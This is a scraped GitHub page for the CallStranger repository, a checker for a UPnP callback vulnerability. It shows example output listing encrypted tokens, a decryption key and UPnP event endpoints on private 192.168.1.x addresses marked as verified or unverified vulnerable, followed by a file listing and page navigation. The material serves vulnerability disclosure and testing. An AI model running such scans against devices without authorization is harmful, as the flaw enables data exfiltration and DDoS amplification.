gAAAAABe3eWNBpQ_jvIj1auFPntVMxiNgqCAMMLd4m960P-5nA87VRRR-cCDjUthjQ1BaiXYGw9lJ2QS6u6Iq1jl_ugpE8ef7hoeuK9oT33wDIjm9cST_xj4IYW_S2SddtSsHhIwtkMX
gAAAAABe3eWNk6hSWo8XmOpY-kvAsWA4ztVyP71dJy0Pit2GWl9lH5u7CiU8selzo2uSXmRczZYz2MMwbF45En3rkfmhk5JkRHRQOpytn1GhDClqevh-S6UBAiDiRvcnBFRhAyb-C6mjvOCbjpZ1amIaQs5wxPFH9OSCT6aeIp5BRPeCLbk0XsbExDvq7Kilmf0X-CeoJxwrOlzhEFt3aA9UbzrP5WKq_6KAVtxk_rDMemINYtBsjMwyAwSFIr2duohzAsL7pe-f
gAAAAABe3eWNXMZtJ2FXZUd6l9fPF4W6zyJ-jSIV7-YnsOAuS_3P8Qg_J59XfUp5l5SFUFzL5d_SyCFtTENW2sMrQZjGt5ZGZBMjmZfnNjNfmwpJwN9ZjKK_NCy4NRV69ipJG3E5evaeEbg4cOh2iwM_eCMyMdPzYD4MNBKaDFHG3QTUpPItjGdX169O3A77VaLH61OV0QSFmUcYro7yYCGRrj1B3G6Gl9vHPXUxfVZN5GqhgW2sHvZmTZUs7UKLVgzoEaS2Oy6h
gAAAAABe3eWNdiaamddL1mXEEsXlJQRwPTTyy1vsWMFfYS02X8or9Rk8oS_nQPzDJzDYhn2UrwRgdW1evZRz-lYAmFqZnyb6R6JH0kFpd5Ds36KpFssmKRwTUBaRv3LjYl5SDt7r4Q1TCeGuKRHAPOQ3nKv5xovNNtNz38k-escgkwW9oRBPQAFnLZxQPwh3eb8bfLUl_1nxwZsdPKfB8Fp_wOjNezjXql9ljwtkzMy2Rzas9D9T9AoydyV_I60qyjJVNHy4As6T
gAAAAABe3eWNSafCBN8pkwe2BMPrzwV1SzOUWciHVwYbPyTt1tut-PEkaQ2oDjS0yz0hd0t02pD35_DIkHhV_XRaGq5KMMdo6nnJ5sFjvhQ0uAilJF-4doO7DdWww7YNyZdo4258jmLQ2YRLSXodwQJXUlvVJN3pJIe4e9m9MjCbT214I61Ue14euKxx470mSpvpZCnVeQYnnUoS8SKkXibFVmJ-qpW4Ep3x8Xbb34GnSXe01OJpvf39uYZGsuKz0paeVgJTbnLl
gAAAAABe3eWN5YhNQVAQagPd3LpBocI7jwkv8caPKiPAfeeD5X1uNSFZ7mfTWB3QwFcsVcbFln5JrVD3mlvHzD3UrYUC0VK_uRHd_c2K-m6h_Od2NUNB1dduNNMh7rMa0a2Wlq8WxxZn


Decyripting vulnerable services with key: b'yy8e8uAg4kV-oSAuvdxrJBPwxMHx0JuEm1BsYXCzBYE='

Verified vulnerable services:
1:      http://192.168.1.22:2870/event/RenderingControl
2:      http://192.168.1.22:2870/event/ConnectionManager
3:      http://192.168.1.22:2870/event/AVTransport
4:      http://192.168.1.40:2870/RenderingControl/event
5:      http://192.168.1.40:2870/ConnectionManager/event
6:      http://192.168.1.40:2870/AVTransport/event
7:      http://192.168.1.1:37215/evt/Layer3Forwarding_1
8:      http://192.168.1.40:2870/RenderingControl/event
9:      http://192.168.1.40:2870/ConnectionManager/event
10:     http://192.168.1.40:2870/AVTransport/event
11:     http://192.168.1.31:2869/upnphost/udhisapi.dll?event=uuid:7ea9d240-fbe4-4ad8-8001-5074901c3695+urn:upnp-org:serviceId:RenderingControl
12:     http://192.168.1.24:2869/upnphost/udhisapi.dll?event=uuid:e4d56268-9801-43d2-b1cf-0dbf71d3c06c+urn:upnp-org:serviceId:RenderingControl
13:     http://192.168.1.24:2869/upnphost/udhisapi.dll?event=uuid:e4d56268-9801-43d2-b1cf-0dbf71d3c06c+urn:upnp-org:serviceId:AVTransport
14:     http://192.168.1.24:2869/upnphost/udhisapi.dll?event=uuid:e4d56268-9801-43d2-b1cf-0dbf71d3c06c+urn:upnp-org:serviceId:ConnectionManager
15:     http://192.168.1.1:37215/evt/WANPPPConnection_1

Unverified  services:
1:      http://192.168.1.1:37215/evt/WANCommonInterfaceConfig_1
2:      http://192.168.1.1:37215/evt/WANEthernetLinkConfig_1
3:      http://192.168.1.1:37215/evt/LANHostConfigManagement_1
4:      http://192.168.1.22:49154/upnp/event/ContentDirectoryNmsO
5:      http://192.168.1.22:49154/upnp/event/ConnectionManagerNmsO

        Visit https://www.CallStranger.com for updates

Name		Name	Last commit message	Last commit date
Latest commit History 20 Commits
upnpy		upnpy
.gitattributes		.gitattributes
.gitignore		.gitignore
CallDirect.py		CallDirect.py
CallStranger - Technical Report.pdf		CallStranger - Technical Report.pdf
CallStranger.php		CallStranger.php
CallStranger.py		CallStranger.py
ExampleOutput.txt		ExampleOutput.txt
LICENSE		LICENSE
README.md		README.md
callback.rfc		callback.rfc
requirements.txt		requirements.txt
setup.cfg		setup.cfg
setup.py		setup.py

License

yunuscadirci/CallStranger

Folders and files

Latest commit

History

Repository files navigation

CallStranger

CallStranger Vulnerability

Install

Usage

How script works?

Example Output

About

Resources

License

Stars

Watchers

Forks

Languages